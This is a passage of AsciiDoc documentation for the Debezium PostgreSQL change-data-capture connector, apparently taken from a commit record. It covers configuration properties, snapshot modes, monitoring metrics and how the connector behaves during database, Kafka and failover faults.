See link:https:\/\/www.postgresql.org\/docs\/current\/static\/libpq-connect.html[the PostgreSQL documentation] for more information.\n\n|[[postgresql-property-tombstones-on-delete]]<<postgresql-property-tombstones-on-delete, `+tombstones.on.delete+`>>\n|`true`\n|Controls whether a tombstone event should be generated after a _delete_ event. +\n +\n`true` - delete operations are represented by a _delete_ event and a subsequent tombstone event. +\n +\n`false` - only a _delete_ event is sent. +\n +\nAfter a _delete_ operation, emitting a tombstone event enables Kafka to delete all change event records that have the same key as the deleted row.\n\n|[[postgresql-property-column-truncate-to-length-chars]]<<postgresql-property-column-truncate-to-length-chars, `+column.truncate.to._length_.chars+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event records, values in these columns are truncated if they are longer than the number of characters specified by _length_ in the property name. You can specify multiple properties with different lengths in a single configuration. Length must be a positive integer, for example, `+column.truncate.to.20.chars+`.\n\n|[[postgresql-property-column-mask-with-length-chars]]<<postgresql-property-column-mask-with-length-chars, `+column.mask.with._length_.chars+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event values, the values in the specified table columns are replaced with _length_ number of asterisk (`*`) characters. You can specify multiple properties with different lengths in a single configuration. Length must be a positive integer or zero. When you specify zero, the connector replaces a value with an empty string.\n\n|[[postgresql-property-column-mask-hash]]<<postgresql-property-column-mask-hash, `+column.mask.hash._hashAlgorithm_.with.salt._salt_+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event values, the values in the specified columns are replaced with pseudonyms. +\n +\nA pseudonym consists of the hashed value that results from applying the specified _hashAlgorithm_ and _salt_. Based on the hash function that is used, referential integrity is kept while column values are replaced with pseudonyms. Supported hash functions are described in the {link-java7-standard-names}[MessageDigest section] of the Java Cryptography Architecture Standard Algorithm Name Documentation. +\n +\nIf necessary, the pseudonym is automatically shortened to the length of the column. You can specify multiple properties with different hash algorithms and salts in a single configuration. In the following example, `CzQMA0cB5K` is a randomly selected salt. 
+\n +\n`column.mask.hash.SHA-256.with.salt.CzQMA0cB5K=inventory.orders.customerName,inventory.shipment.customerName` +\n +\nDepending on the _hashAlgorithm_ used, the _salt_ selected, and the actual data set, the resulting masked data set might not be completely masked.\n\n|[[postgresql-property-column-propagate-source-type]]<<postgresql-property-column-propagate-source-type, `+column.propagate.source.type+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_. +\n +\nFor each specified column, the connector adds the column's original type and original length as parameters to the corresponding field schemas in the emitted change records. The following added schema parameters propagate the original type name and also the original length for variable-width types: +\n +\n`pass:[_]pass:[_]debezium.source.column.type` + `pass:[_]pass:[_]debezium.source.column.length` + `pass:[_]pass:[_]debezium.source.column.scale` +\n +\nThis property is useful for properly sizing corresponding columns in sink databases.\n\n|[[postgresql-property-datatype-propagate-source-type]]<<postgresql-property-datatype-propagate-source-type, `+datatype.propagate.source.type+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the database-specific data type name for some columns. Fully-qualified data type names are of the form _databaseName_._tableName_._typeName_, or _databaseName_._schemaName_._tableName_._typeName_. +\n +\nFor these data types, the connector adds parameters to the corresponding field schemas in emitted change records. The added parameters specify the original type and length of the column: +\n +\n`pass:[_]pass:[_]debezium.source.column.type` + `pass:[_]pass:[_]debezium.source.column.length` + `pass:[_]pass:[_]debezium.source.column.scale` +\n +\nThese parameters propagate a column's original type name and length, for variable-width types, respectively. This property is useful for properly sizing corresponding columns in sink databases. +\n +\nSee the {link-prefix}:{link-postgresql-connector}#postgresql-data-types[list of PostgreSQL-specific data type names].\n\n|[[postgresql-property-message-key-columns]]<<postgresql-property-message-key-columns, `+message.key.columns+`>>\n|_empty string_\n|A semicolon-separated list of tables with regular expressions that match table column names. The connector maps values in matching columns to key fields in change event records that it sends to Kafka topics. This is useful when a table does not have a primary key, or when you want to order change event records in a Kafka topic according to a field that is not a primary key. +\n +\nSeparate entries with semicolons. Insert a colon between the fully-qualified table name and its regular expression. The format is: +\n +\n_schema-name_._table-name_:_regexp_;... 
+\n +\nFor example, +\n +\n`schemaA.table_a:regex_1;schemaB.table_b:regex_2;schemaC.table_c:regex_3` +\n +\nIf `table_a` has an `id` column, and `regex_1` is `^i` (matches any column that starts with `i`), the connector maps the value in ``table_a``'s `id` column to a key field in change events that the connector sends to Kafka.\n\n|[[postgresql-publication-autocreate-mode]]<<postgresql-publication-autocreate-mode, `+publication.autocreate.mode+`>>\n|`all_tables`\n|Applies only when streaming changes by using link:https:\/\/www.postgresql.org\/docs\/current\/sql-createpublication.html[the `pgoutput` plug-in]. The setting determines how creation of a link:https:\/\/www.postgresql.org\/docs\/current\/logical-replication-publication.html[publication] should work. Possible settings are: +\n +\n`all_tables` - If a publication exists, the connector uses it. If a publication does not exist, the connector creates a publication for all tables in the database for which the connector is capturing changes. This requires that the database user that has permission to perform replications also has permission to create a publication. This is granted with `CREATE PUBLICATION <publication_name> FOR ALL TABLES;`. +\n +\n`disabled` - The connector does not attempt to create a publication. A database administrator or the user configured to perform replications must have created the publication before running the connector. If the connector cannot find the publication, the connector throws an exception and stops. +\n +\n`filtered` - If a publication exists, the connector uses it. If no publication exists, the connector creates a new publication for tables that match the current filter configuration as specified by the `database.exclude.list`, `schema.include.list`, `schema.exclude.list`, and `table.include.list` connector configuration properties. For example: `CREATE PUBLICATION <publication_name> FOR TABLE <tbl1, tbl2, tbl3>`.\n\n|[[postgresql-property-binary-handling-mode]]<<postgresql-property-binary-handling-mode, `+binary.handling.mode+`>>\n|`bytes`\n|Specifies how binary (`bytea`) columns should be represented in change events: +\n +\n`bytes` represents binary data as byte array. +\n +\n`base64` represents binary data as base64-encoded strings. +\n +\n`hex` represents binary data as hex-encoded (base16) strings.\n\n|[[postgresql-property-truncate-handling-mode]]<<postgresql-property-truncate-handling-mode, `+truncate.handling.mode+`>>\n|`skip`\n|Specifies whether `TRUNCATE` events should be propagated (only available when using the `pgoutput` plug-in with Postgres 11 or later): +\n +\n`skip` causes those events to be omitted (the default). +\n +\n`include` causes those events to be included. +\n +\nSee xref:postgresql-truncate-events[] for the structure of _truncate_ events and their ordering semantics.\n\n|===\n\n[id=\"postgresql-advanced-configuration-properties\"]\nThe following _advanced_ configuration properties have defaults that work in most situations and therefore rarely need to be specified in the connector's configuration.\n\n.Advanced connector configuration properties\n[cols=\"30%a,28%a,42%a\",options=\"header\"]\n|===\n|Property\n|Default\n|Description\n\n|[[postgresql-property-snapshot-mode]]<<postgresql-property-snapshot-mode, `+snapshot.mode+`>>\n|`initial`\n|Specifies the criteria for performing a snapshot when the connector starts: +\n +\n`initial` - The connector performs a snapshot only when no offsets have been recorded for the logical server name. 
+\n +\n`always` - The connector performs a snapshot each time the connector starts. +\n +\n`never` - The connector never performs snapshots. When a connector is configured this way, its behavior when it starts is as follows. If there is a previously stored LSN in the Kafka offsets topic, the connector continues streaming changes from that position. If no LSN has been stored, the connector starts streaming changes from the point in time when the PostgreSQL logical replication slot was created on the server. The `never` snapshot mode is useful only when you know all data of interest is still reflected in the WAL. +\n +\n`initial_only` - The connector performs an initial snapshot and then stops, without processing any subsequent changes. +\n +\n`exported` - The connector performs a snapshot based on the point in time when the replication slot was created. This is an excellent way to perform the snapshot in a lock-free way. +\n +\nifdef::community[]\n`custom` - The connector performs a snapshot according to the setting for the `snapshot.custom.class` property, which is a custom implementation of the `io.debezium.connector.postgresql.spi.Snapshotter` interface. +\nendif::community[]\n +\nThe {link-prefix}:{link-postgresql-connector}#snapshot-mode-settings[reference table for snapshot mode settings] has more details.\n\nifdef::community[]\n|[[postgresql-property-snapshot-custom-class]]<<postgresql-property-snapshot-custom-class, `+snapshot.custom.class+`>>\n|\n|A full Java class name that is an implementation of the `io.debezium.connector.postgresql.spi.Snapshotter` interface. Required when the `snapshot.mode` property is set to `custom`. See {link-prefix}:{link-postgresql-connector}#postgresql-custom-snapshot[custom snapshotter SPI].\nendif::community[]\n\n|[[postgresql-property-snapshot-include-collection-list]]<<postgresql-property-snapshot-include-collection-list, `+snapshot.include.collection.list+`>>\n| All tables specified in `table.include.list`\n|An optional, comma-separated list of regular expressions that match names of tables specified in `table.include.list` for which you *want* to take the snapshot when the `snapshot.mode` is not `never`.\n\n|[[postgresql-property-snapshot-lock-timeout-ms]]<<postgresql-property-snapshot-lock-timeout-ms, `+snapshot.lock.timeout.ms+`>>\n|`10000`\n|Positive integer value that specifies the maximum amount of time (in milliseconds) to wait to obtain table locks when performing a snapshot. If the connector cannot acquire table locks in this time interval, the snapshot fails. {link-prefix}:{link-postgresql-connector}#postgresql-snapshots[How the connector performs snapshots] provides details.\n\n|[[postgresql-property-snapshot-select-statement-overrides]]<<postgresql-property-snapshot-select-statement-overrides, `+snapshot.select.statement.overrides+`>>\n|\n|Controls which table rows are included in snapshots. This property affects snapshots only. It does not affect events that are generated by the logical decoding plug-in. Specify a comma-separated list of fully-qualified table names in the form _databaseName.tableName_. +\n +\nFor each table that you specify, also specify another configuration property: `snapshot.select.statement.overrides._DB_NAME_._TABLE_NAME_`, for example: `snapshot.select.statement.overrides.customers.orders`. Set this property to a `SELECT` statement that obtains only the rows that you want in the snapshot. When the connector performs a snapshot, it executes this `SELECT` statement to retrieve data from that table. 
+\n +\nA possible use case for setting these properties is large, append-only tables. You can specify a `SELECT` statement that sets a specific point for where to start a snapshot, or where to resume a snapshot if a previous snapshot was interrupted.\n\n|[[postgresql-property-event-processing-failure-handling-mode]]<<postgresql-property-event-processing-failure-handling-mode, `+event.processing.failure.handling.mode+`>>\n|`fail`\n|Specifies how the connector should react to exceptions during processing of events: +\n +\n`fail` propagates the exception, indicates the offset of the problematic event, and causes the connector to stop. +\n +\n`warn` logs the offset of the problematic event, skips that event, and continues processing. +\n +\n`skip` skips the problematic event and continues processing.\n\n|[[postgresql-property-max-queue-size]]<<postgresql-property-max-queue-size, `+max.queue.size+`>>\n|`20240`\n|Positive integer value for the maximum size of the blocking queue. The connector places change events received from streaming replication in the blocking queue before writing them to Kafka. This queue can provide backpressure when, for example, writing records to Kafka is slower than it should be or Kafka is not available.\n\n|[[postgresql-property-max-batch-size]]<<postgresql-property-max-batch-size, `+max.batch.size+`>>\n|`10240`\n|Positive integer value that specifies the maximum size of each batch of events that the connector processes.\n\n|[[postgresql-property-max-queue-size-in-bytes]]<<postgresql-property-max-queue-size-in-bytes, `+max.queue.size.in.bytes+`>>\n|`0`\n|Long value for the maximum size in bytes of the blocking queue. This feature is disabled by default; it becomes active if the property is set to a positive long value.\n\n|[[postgresql-property-poll-interval-ms]]<<postgresql-property-poll-interval-ms, `+poll.interval.ms+`>>\n|`1000`\n|Positive integer value that specifies the number of milliseconds the connector should wait for new change events to appear before it starts processing a batch of events. Defaults to 1000 milliseconds, or 1 second.\n\n|[[postgresql-property-include-unknown-datatypes]]<<postgresql-property-include-unknown-datatypes, `+include.unknown.datatypes+`>>\n|`false`\n|Specifies connector behavior when the connector encounters a field whose data type is unknown. The default behavior is that the connector omits the field from the change event and logs a warning. +\n +\nSet this property to `true` if you want the change event to contain an opaque binary representation of the field. This lets consumers decode the field. You can control the exact representation by setting the {link-prefix}:{link-postgresql-connector}#postgresql-property-binary-handling-mode[`binary handling mode`] property.\n\nNOTE: Consumers risk backward compatibility issues when `include.unknown.datatypes` is set to `true`. Not only may the database-specific binary representation change between releases, but if the data type is eventually supported by {prodname}, the data type will be sent downstream in a logical type, which would require adjustments by consumers. In general, when encountering unsupported data types, create a feature request so that support can be added.\n\n|[[postgresql-property-database-initial-statements]]<<postgresql-property-database-initial-statements, `+database.initial.statements+`>>\n|\n|A semicolon-separated list of SQL statements that the connector executes when it establishes a JDBC connection to the database. 
To use a semicolon as a character and not as a delimiter, specify two consecutive semicolons, `;;`. +\n +\nThe connector may establish JDBC connections at its own discretion. Consequently, this property is useful for configuration of session parameters only, and not for executing DML statements. +\n +\nThe connector does not execute these statements when it creates a connection for reading the transaction log.\n\n|[[postgresql-property-heartbeat-interval-ms]]<<postgresql-property-heartbeat-interval-ms, `+heartbeat.interval.ms+`>>\n|`0`\n|Controls how frequently the connector sends heartbeat messages to a Kafka topic. The default behavior is that the connector does not send heartbeat messages. +\n +\nHeartbeat messages are useful for monitoring whether the connector is receiving change events from the database. Heartbeat messages might help decrease the number of change events that need to be re-sent when a connector restarts. To send heartbeat messages, set this property to a positive integer, which indicates the number of milliseconds between heartbeat messages. +\n +\nHeartbeat messages are needed when there are many updates in a database that is being tracked but only a tiny number of updates are related to the tables and schemas for which the connector is capturing changes. In this situation, the connector reads from the database transaction log as usual but rarely emits change records to Kafka. This means that no offset updates are committed to Kafka and the connector does not have an opportunity to send the latest retrieved LSN to the database. The database retains WAL files that contain events that have already been processed by the connector. Sending heartbeat messages enables the connector to send the latest retrieved LSN to the database, which allows the database to reclaim disk space used by WAL files that are no longer needed.\n\n|[[postgresql-property-heartbeat-topics-prefix]]<<postgresql-property-heartbeat-topics-prefix, `+heartbeat.topics.prefix+`>>\n|`__debezium-heartbeat`\n|Controls the name of the topic to which the connector sends heartbeat messages. The topic name has this pattern: +\n +\n_<heartbeat.topics.prefix>_._<server.name>_ +\n +\nFor example, if the database server name is `fulfillment`, the default topic name is `__debezium-heartbeat.fulfillment`.\n\n|[[postgresql-property-heartbeat-action-query]]<<postgresql-property-heartbeat-action-query, `+heartbeat.action.query+`>>\n|\n|Specifies a query that the connector executes on the source database when the connector sends a heartbeat message. +\n +\nThis is useful for resolving the situation described in {link-prefix}:{link-postgresql-connector}#postgresql-wal-disk-space[WAL disk space consumption], where capturing changes from a low-traffic database on the same host as a high-traffic database prevents {prodname} from processing WAL records and thus acknowledging WAL positions with the database. 
To address this situation, create a heartbeat table in the low-traffic database, and set this property to a statement that inserts records into that table, for example: +\n +\n`INSERT INTO test_heartbeat_table (text) VALUES ('test_heartbeat')` +\n +\nThis allows the connector to receive changes from the low-traffic database and acknowledge their LSNs, which prevents unbounded WAL growth on the database host.\n\n|[[postgresql-property-schema-refresh-mode]]<<postgresql-property-schema-refresh-mode, `+schema.refresh.mode+`>>\n|`columns_diff`\n|Specifies the conditions that trigger a refresh of the in-memory schema for a table. +\n +\n`columns_diff` is the safest mode. It ensures that the in-memory schema stays in sync with the database table's schema at all times. +\n +\n`columns_diff_exclude_unchanged_toast` instructs the connector to refresh the in-memory schema cache if there is a discrepancy with the schema derived from the incoming message, unless unchanged TOASTable data fully accounts for the discrepancy. +\n +\nThis setting can significantly improve connector performance when tables are frequently updated but their TOASTed data is rarely part of those updates. However, it is possible for the in-memory schema to become outdated if TOASTable columns are dropped from the table.\n\n|[[postgresql-property-snapshot-delay-ms]]<<postgresql-property-snapshot-delay-ms, `+snapshot.delay.ms+`>>\n|\n|An interval in milliseconds that the connector should wait before performing a snapshot when the connector starts. If you are starting multiple connectors in a cluster, this property is useful for avoiding snapshot interruptions, which might cause re-balancing of connectors.\n\n|[[postgresql-property-snapshot-fetch-size]]<<postgresql-property-snapshot-fetch-size, `+snapshot.fetch.size+`>>\n|`10240`\n|During a snapshot, the connector reads table content in batches of rows. This property specifies the maximum number of rows in a batch.\n\n|[[postgresql-property-slot-stream-params]]<<postgresql-property-slot-stream-params, `+slot.stream.params+`>>\n|\n|Semicolon-separated list of parameters to pass to the configured logical decoding plug-in. For example, `add-tables=public.table,public.table2;include-lsn=true`.\n\nifdef::community[]\nIf you are using the `wal2json` plug-in, this property is useful for enabling server-side table filtering. 
Allowed values depend on the configured plug-in.\nendif::community[]\n\n|[[postgresql-property-sanitize-field-names]]<<postgresql-property-sanitize-field-names, `+sanitize.field.names+`>>\n|`true` if connector configuration sets the `key.converter` or `value.converter` property to the Avro converter.\n\n`false` if not.\n|Indicates whether field names are sanitized to adhere to {link-prefix}:{link-avro-serialization}#avro-naming[Avro naming requirements].\n\n|[[postgresql-property-slot-max-retries]]<<postgresql-property-slot-max-retries, `+slot.max.retries+`>>\n|`6`\n|If connecting to a replication slot fails, this is the maximum number of consecutive attempts to connect.\n\n|[[postgresql-property-slot-retry-delay-ms]]<<postgresql-property-slot-retry-delay-ms, `+slot.retry.delay.ms+`>>\n|`10000` (10 seconds)\n|The number of milliseconds to wait between retry attempts when the connector fails to connect to a replication slot.\n\n|[[postgresql-property-toasted-value-placeholder]]<<postgresql-property-toasted-value-placeholder, `+toasted.value.placeholder+`>>\n|`__debezium_unavailable_value`\n|Specifies the constant that the connector provides to indicate that the original value is a toasted value that is not provided by the database.\nIf the setting of `toasted.value.placeholder` starts with the `hex:` prefix, the rest of the string is expected to be hexadecimally encoded octets. See {link-prefix}:{link-postgresql-connector}#postgresql-toasted-values[toasted values] for additional details.\n\n|[[postgresql-property-provide-transaction-metadata]]<<postgresql-property-provide-transaction-metadata, `+provide.transaction.metadata+`>>\n|`false`\n|Determines whether the connector generates events with transaction boundaries and enriches change event envelopes with transaction metadata. Specify `true` if you want the connector to do this. See {link-prefix}:{link-postgresql-connector}#postgresql-transaction-metadata[Transaction metadata] for details.\n\n|[[postgresql-property-retriable-restart-connector-wait-ms]]<<postgresql-property-retriable-restart-connector-wait-ms, `+retriable.restart.connector.wait.ms+`>>\n|`10000` (10 seconds)\n|The number of milliseconds to wait before restarting a connector after a retriable error occurs.\n\n|===\n\n[id=\"postgresql-pass-through-properties\"]\n.Pass-through connector configuration properties\nThe connector also supports _pass-through_ configuration properties that are used when creating the Kafka producer and consumer.\n\nBe sure to consult the {link-kafka-docs}.html[Kafka documentation] for all of the configuration properties for Kafka producers and consumers. 
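\n\nFor orientation, the following sketch shows how a few of the connector properties that are described in the preceding table might be combined in a connector registration request. The connector class name is the standard one for this connector; the connection values, connector name, and property choices are illustrative placeholders, not recommended defaults:\n\n[source,json,indent=0]\n----\n{\n  \"name\": \"fulfillment-connector\",  \/\/ illustrative connector name\n  \"config\": {\n    \"connector.class\": \"io.debezium.connector.postgresql.PostgresConnector\",\n    \"database.hostname\": \"192.168.99.100\",\n    \"database.port\": \"5432\",\n    \"database.user\": \"postgres\",\n    \"database.password\": \"postgres\",\n    \"database.dbname\": \"postgres\",\n    \"database.server.name\": \"fulfillment\",\n    \"snapshot.mode\": \"exported\",\n    \"heartbeat.interval.ms\": \"10000\"\n  }\n}\n----\n\n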
The PostgreSQL connector does use the {link-kafka-docs}.html#consumerconfigs[new consumer configuration properties].\n\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-postgresql-connector-performance\n\/\/ Title: Monitoring {prodname} PostgreSQL connector performance\n[[postgresql-monitoring]]\n== Monitoring\n\nThe {prodname} PostgreSQL connector provides two types of metrics that are in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect provide.\n\n* {link-prefix}:{link-postgresql-connector}#postgresql-snapshot-metrics[Snapshot metrics] provide information about connector operation while performing a snapshot.\n* {link-prefix}:{link-postgresql-connector}#postgresql-streaming-metrics[Streaming metrics] provide information about connector operation when the connector is capturing changes and streaming change event records.\n\n{link-prefix}:{link-debezium-monitoring}#monitoring-debezium[{prodname} monitoring documentation] provides details for how to expose these metrics by using JMX.\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-during-snapshots-of-postgresql-databases\n\/\/ Title: Monitoring {prodname} during snapshots of PostgreSQL databases\n[[postgresql-snapshot-metrics]]\n=== Snapshot metrics\n\nThe *MBean* is `debezium.postgres:type=connector-metrics,context=snapshot,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-snapshot-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-postgresql-connector-record-streaming\n\/\/ Title: Monitoring {prodname} PostgreSQL connector record streaming\n[[postgresql-streaming-metrics]]\n=== Streaming metrics\n\nThe *MBean* is `debezium.postgres:type=connector-metrics,context=streaming,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-streaming-metrics.adoc[leveloffset=+1]\n\n\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-postgresql-connectors-handle-faults-and-problems\n\/\/ Title: How {prodname} PostgreSQL connectors handle faults and problems\n[[postgresql-when-things-go-wrong]]\n== Behavior when things go wrong\n\n{prodname} is a distributed system that captures all changes in multiple upstream databases; it never misses or loses an event. When the system is operating normally and is being managed carefully, {prodname} provides _exactly once_ delivery of every change event record.\n\nIf a fault does happen, the system does not lose any events. However, while it is recovering from the fault, it might repeat some change events. 
In these abnormal situations, {prodname}, like Kafka, provides _at least once_ delivery of change events.\n\nifdef::community[]\nThe rest of this section describes how {prodname} handles various kinds of faults and problems.\nendif::community[]\n\nifdef::product[]\nDetails are in the following sections:\n\n* xref:postgresql-connector-configuration-and-startup-errors[]\n* xref:postgresql-becomes-unavailable[]\n* xref:postgresql-cluster-failures[]\n* xref:postgresql-kafka-connect-process-stops-gracefully[]\n* xref:postgresql-kafka-connect-process-crashes[]\n* xref:postgresql-kafka-becomes-unavailable[]\n* xref:postgresql-connector-is-stopped-for-a-duration[]\nendif::product[]\n\n[id=\"postgresql-connector-configuration-and-startup-errors\"]\n=== Configuration and startup errors\n\nIn the following situations, the connector fails when trying to start, reports an error\/exception in the log, and stops running:\n\n* The connector's configuration is invalid.\n* The connector cannot successfully connect to PostgreSQL by using the specified connection parameters.\n* The connector is restarting from a previously recorded position in the PostgreSQL WAL (by using the LSN) and PostgreSQL no longer has that history available.\n\nIn these cases, the error message has details about the problem and possibly a suggested workaround. After you correct the configuration or address the PostgreSQL problem, restart the connector.\n\n[id=\"postgresql-becomes-unavailable\"]\n=== PostgreSQL becomes unavailable\n\nWhen the connector is running, the PostgreSQL server that it is connected to could become unavailable for any number of reasons. If this happens, the connector fails with an error and stops. When the server is available again, restart the connector.\n\nThe PostgreSQL connector externally stores the last processed offset in the form of a PostgreSQL LSN. After a connector restarts and connects to a server instance, the connector communicates with the server to continue streaming from that particular offset. This offset is available as long as the {prodname} replication slot remains intact. Never drop a replication slot on the primary server, or you will lose data. See the next section for failure cases in which a slot has been removed.\n\n[id=\"postgresql-cluster-failures\"]\n=== Cluster failures\n\nAs of release 12, PostgreSQL allows logical replication slots _only on primary servers_. This means that you can point a {prodname} PostgreSQL connector only to the active primary server of a database cluster.\nAlso, replication slots themselves are not propagated to replicas.\nIf the primary server goes down, a new primary must be promoted.\n\nifdef::community[]\nThe new primary must have the {link-prefix}:{link-postgresql-connector}#installing-postgresql-output-plugin[logical decoding plug-in] installed and a replication slot that is configured for use by the plug-in and the database for which you want to capture changes. Only then can you point the connector to the new server and restart the connector.\nendif::community[]\n\nifdef::product[]\nThe new primary must have a replication slot that is configured for use by the `pgoutput` plug-in and the database in which you want to capture changes. Only then can you point the connector to the new server and restart the connector.\nendif::product[]\n\nThere are important caveats when failovers occur, and you should pause {prodname} until you can verify that you have an intact replication slot that has not lost data. 
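\n\nTo check the state of a replication slot, you can query the `pg_replication_slots` catalog view on the server; the following is a minimal sketch, and the column selection is illustrative:\n\n[source,sql,indent=0]\n----\n-- Inspect replication slots; confirmed_flush_lsn is the last position\n-- that the consumer of the slot has acknowledged\nSELECT slot_name, plugin, active, restart_lsn, confirmed_flush_lsn\nFROM pg_replication_slots;\n----\n\n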
After a failover:\n\n* There must be a process that re-creates the {prodname} replication slot before allowing the application to write to the *new* primary. This is crucial. Without this process, your application can miss change events.\n\n* You might need to verify that {prodname} was able to read all changes in the slot **before the old primary failed**.\n\nOne reliable method of recovering and verifying whether any changes were lost is to recover a backup of the failed primary to the point immediately before it failed. While this can be administratively difficult, it allows you to inspect the replication slot for any unconsumed changes.\n\nifdef::community[]\n\n[NOTE]\n====\nThere are discussions in the PostgreSQL community around a feature called `failover slots` that would help mitigate this problem, but as of PostgreSQL 12, they have not been implemented. However, there is active development for PostgreSQL 13 to support logical decoding on standbys, which is a major requirement to make failover possible. You can find more about this in this link:https:\/\/www.postgresql.org\/message-id\/CAJ3gD9fE=0w50sRagcs+jrktBXuJAWGZQdSTMa57CCY+Dh-xbg@mail.gmail.com[community thread].\n\nMore about the concept of failover slots is in link:http:\/\/blog.2ndquadrant.com\/failover-slots-postgresql[this blog post].\n====\nendif::community[]\n\n[id=\"postgresql-kafka-connect-process-stops-gracefully\"]\n=== Kafka Connect process stops gracefully\n\nSuppose that Kafka Connect is being run in distributed mode and a Kafka Connect process is stopped gracefully. Prior to shutting down that process, Kafka Connect migrates the process's connector tasks to another Kafka Connect process in that group. The new connector tasks start processing exactly where the prior tasks stopped. There is a short delay in processing while the connector tasks are stopped gracefully and restarted on the new processes.\n\n[id=\"postgresql-kafka-connect-process-crashes\"]\n=== Kafka Connect process crashes\n\nIf the Kafka Connect process stops unexpectedly, any connector tasks it was running terminate without recording their most recently processed offsets. When Kafka Connect is being run in distributed mode, Kafka Connect restarts those connector tasks on other processes. However, PostgreSQL connectors resume from the last offset that was _recorded_ by the earlier processes. This means that the new replacement tasks might generate some of the same change events that were processed just prior to the crash. The number of duplicate events depends on the offset flush period and the volume of data changes just before the crash.\n\nBecause there is a chance that some events might be duplicated during a recovery from failure, consumers should always anticipate some duplicate events. {prodname} changes are idempotent, so a sequence of events always results in the same state.\n\nIn each change event record, {prodname} connectors insert source-specific information about the origin of the event, including the PostgreSQL server's time of the event, the ID of the server transaction, and the position in the write-ahead log where the transaction changes were written. Consumers can keep track of this information, especially the LSN, to determine whether an event is a duplicate.\n\n[id=\"postgresql-kafka-becomes-unavailable\"]\n=== Kafka becomes unavailable\n\nAs the connector generates change events, the Kafka Connect framework records those events in Kafka by using the Kafka producer API. 
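\n\nAs described next, Kafka Connect commits connector offsets periodically; the commit frequency is controlled by the worker-level `offset.flush.interval.ms` setting, for example (the value shown is illustrative):\n\n[source,properties]\n----\n# Kafka Connect worker configuration: flush connector offsets every 60 seconds\noffset.flush.interval.ms=60000\n----\n\n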
Periodically, at a frequency that you specify in the Kafka Connect configuration, Kafka Connect records the latest offset that appears in those change events. If the Kafka brokers become unavailable, the Kafka Connect process that is running the connectors repeatedly tries to reconnect to the Kafka brokers. In other words, the connector tasks pause until a connection can be re-established, at which point the connectors resume exactly where they left off.\n\n[id=\"postgresql-connector-is-stopped-for-a-duration\"]\n=== Connector is stopped for a duration\n\nIf the connector is gracefully stopped, the database can continue to be used. Any changes are recorded in the PostgreSQL WAL. When the connector restarts, it resumes streaming changes where it left off. That is, it generates change event records for all database changes that were made while the connector was stopped.\n\nA properly configured Kafka cluster is able to handle massive throughput. Kafka Connect is written according to Kafka best practices, and given enough resources, a Kafka Connect connector can also handle very large numbers of database change events. Because of this, when a {prodname} connector restarts after being stopped for a while, it is very likely to catch up with the database changes that were made while it was stopped. How quickly this happens depends on the capabilities and performance of Kafka and the volume of changes being made to the data in PostgreSQL.\n","old_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n[id=\"debezium-connector-for-postgresql\"]\n= {prodname} connector for PostgreSQL\n\n:context: postgresql\nifdef::community[]\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\n\n{prodname}'s PostgreSQL connector captures row-level changes in the schemas of a PostgreSQL database. PostgreSQL versions 9.6, 10, 11, 12, and 13 are supported.\nendif::community[]\nifdef::product[]\n{prodname}'s PostgreSQL connector captures row-level changes in the schemas of a PostgreSQL database. PostgreSQL versions 10, 11, 12, and 13 are supported.\nendif::product[]\n\nThe first time it connects to a PostgreSQL server or cluster, the connector takes a consistent snapshot of all schemas. After that snapshot is complete, the connector continuously captures row-level changes that insert, update, and delete database content and that were committed to a PostgreSQL database. The connector generates data change event records and streams them to Kafka topics. For each table, the default behavior is that the connector streams all generated events to a separate Kafka topic for that table. 
Applications and services consume data change event records from that topic.\n\nifdef::product[]\nInformation and procedures for using a {prodname} PostgreSQL connector are organized as follows:\n\n* xref:overview-of-debezium-postgresql-connector[]\n* xref:how-debezium-postgresql-connectors-work[]\n* xref:descriptions-of-debezium-postgresql-connector-data-change-events[]\n* xref:how-debezium-postgresql-connectors-map-data-types[]\n* xref:setting-up-postgresql-to-run-a-debezium-connector[]\n* xref:deployment-of-debezium-postgresql-connectors[]\n* xref:monitoring-debezium-postgresql-connector-performance[]\n* xref:how-debezium-postgresql-connectors-handle-faults-and-problems[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ Title: Overview of {prodname} PostgreSQL connector\n\/\/ ModuleID: overview-of-debezium-postgresql-connector\n[[postgresql-overview]]\n== Overview\n\nPostgreSQL's link:https:\/\/www.postgresql.org\/docs\/current\/static\/logicaldecoding-explanation.html[_logical decoding_] feature was introduced in version 9.4. It is a mechanism that allows the extraction of the changes that were committed to the transaction log and the processing of these changes in a user-friendly manner with the help of an link:https:\/\/www.postgresql.org\/docs\/current\/static\/logicaldecoding-output-plugin.html[_output plug-in_]. The output plug-in enables clients to consume the changes.\n\nThe PostgreSQL connector contains two main parts that work together to read and process database changes:\n\n[[postgresql-output-plugin]]\nifdef::community[]\n* A logical decoding output plug-in. You might need to install the output plug-in that you choose to use. You must configure a replication slot that uses your chosen output plug-in before running the PostgreSQL server. The plug-in can be one of the following:\n** link:https:\/\/github.com\/debezium\/postgres-decoderbufs[`decoderbufs`] is based on Protobuf and maintained by the {prodname} community.\n** link:https:\/\/github.com\/eulerto\/wal2json[`wal2json`] is based on JSON and maintained by the wal2json community.\n** `pgoutput` is the standard logical decoding output plug-in in PostgreSQL 10+. It is maintained by the PostgreSQL community, and used by PostgreSQL itself for 